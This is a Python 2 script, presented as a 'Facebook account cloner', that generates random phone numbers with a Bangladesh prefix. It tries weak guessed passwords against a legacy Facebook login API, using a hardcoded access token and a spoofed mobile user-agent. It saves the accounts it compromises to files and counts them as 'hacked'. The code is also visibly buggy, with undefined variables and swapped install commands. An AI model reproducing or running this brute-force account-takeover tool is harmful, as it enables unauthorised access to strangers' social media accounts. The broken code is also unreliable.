# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(9900):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print  nmbr

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]


def exb():
    print '[!] Exit Successfully '
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')

def lodhirt():
    lodhirt = [
     'AM', '   ', 'AM', '  ', 'SHOW MAN\n']
    for o in lodhirt:
        print '\r\x1b[1;94m\x1b[1;91m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
def jalan(x):
	for e in x + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
    titik = [
     '   ', '. ', '.. ', '...', '. ', '.. ', '...', '']
    for o in titik:
        print '\r\x1b[1;97m \x1b[1;91m               Load\x1b[1;92ming\033[1;0m\x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
        


os.system("clear")
logo = """
 \033[1;91m  ___             
\033[1;92m / _ \            
\033[1;93m/ /_\ \ _ __ ___  
\033[1;94m|  _  || '_ ` _ \ 
\033[1;95m| | | || | | | | |
\033[1;96m\_| |_/|_| |_| |_|
\033[1;91m ______   _______  _______  _        ______  
\033[1;92m(  ___ \ (  ____ )(  ___  )( (    /|(  __  \ 
\033[1;93m| (   ) )| (    )|| (   ) ||  \  ( || (  \  )
\033[1;96m| (__/ / | (____)|| (___) ||   \ | || |   ) |
\033[1;94m|  __ (  |     __)|  ___  || (\ \) || |   | |
\033[1;95m| (  \ \ | (\ (   | (   ) || | \   || |   ) |
\033[1;91m| )___) )| ) \ \__| )   ( || )  \  || (__/  )
\033[1;92m|/ \___/ |/   \__/|/     \||/    )_)(______/ 


"""

logo1 = """                              

\033[4;92mSELECT YOUR FAVOURITE SIM CODE \033[1;0m
\033[1;97m[1] BANGLADESH\033[1;93m 175,165,191, 192,
\033[1;97m[2] BANGLADESH\033[1;95m 193, 194, 195, 196
\03l[1;97m[3] BANGLADESH\033[1;92m 197, 198, 199,  ???


\x1b[0;47m  \x1b[3;90mFACEBOOK ACCOUNT CLONER BY \x1b[3;90mSOMI STAR BOY           \033[1;0m
""" 

back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
def menu():
    os.system('clear')
    print logo
    print 47* '\033[1;97m⁃'
    print
    jalan('\033[1;91m (\033[1;92m1\033[1;91m)\033[1;93m START CLONING PAKISTAN ')
    print
    time.sleep(0.5)
    jalan('\033[1;91m (\033[1;92m0\033[1;91m)\033[1;96m CLOSE ')
    print
    print 47* '\033[1;97m⁃'
    action()


def action():
    global cpb
    global oks
    somi = raw_input('\n\n \x1b[1;90m ►')
    if somi == '':
        print '[!] Warning'
        action()
    
    elif somi == '1':
        tik()
        os.system('clear')
        print logo
        print logo1
        try:
            c = raw_input('►')
            k = '+880'
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            somi()                    
    
    elif somi == '0':            
    	exb()
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    print 47* '\033[1;97m_'
    xxx = str(len(id))
    jalan('\033[1;93mTOTAL IDS NUMBER : '+xxx)
    time.sleep(0.5)
    jalan('\033[1;94mTOTAL PASSWORD FOUND : 5')
    time.sleep(0.5)
    jalan ("\033[1;93mPLEASE WAIT, PROCESS IS START ..")
    time.sleep(0.5)
    jalan('\033[1;96mSTOP THIS PROCESS PRESS Ctrl THEN z')
    time.sleep(0.5)
    print 47* '\033[1;97m_'
            
    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
        	pass1 = first_name+ '123'
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +(user)+ '&locale=en_US&password=' + (pass1) + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Open \x1b[1;96mNow  )  ' +(user)+ + ' → ' + pass1                                       
                okb = open('save/successfull.txt', 'a')
                okb.write(user+pass1+'\n')
                okb.close()
                oks.append(user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;92m(Aftar \x1b[1;91m7days) ' + user + ' → ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                
                                                                                                                                                                                                                                                                                 
        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/login.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    print 'SOMI BRAND CODING STAR'
    print ''
    print """
    """
    
    raw_input("\n\033[1;92m[\033[1;92mEXIST\033[1;92m]")
    menu() 
          
if __name__ == '__main__':
    menu()


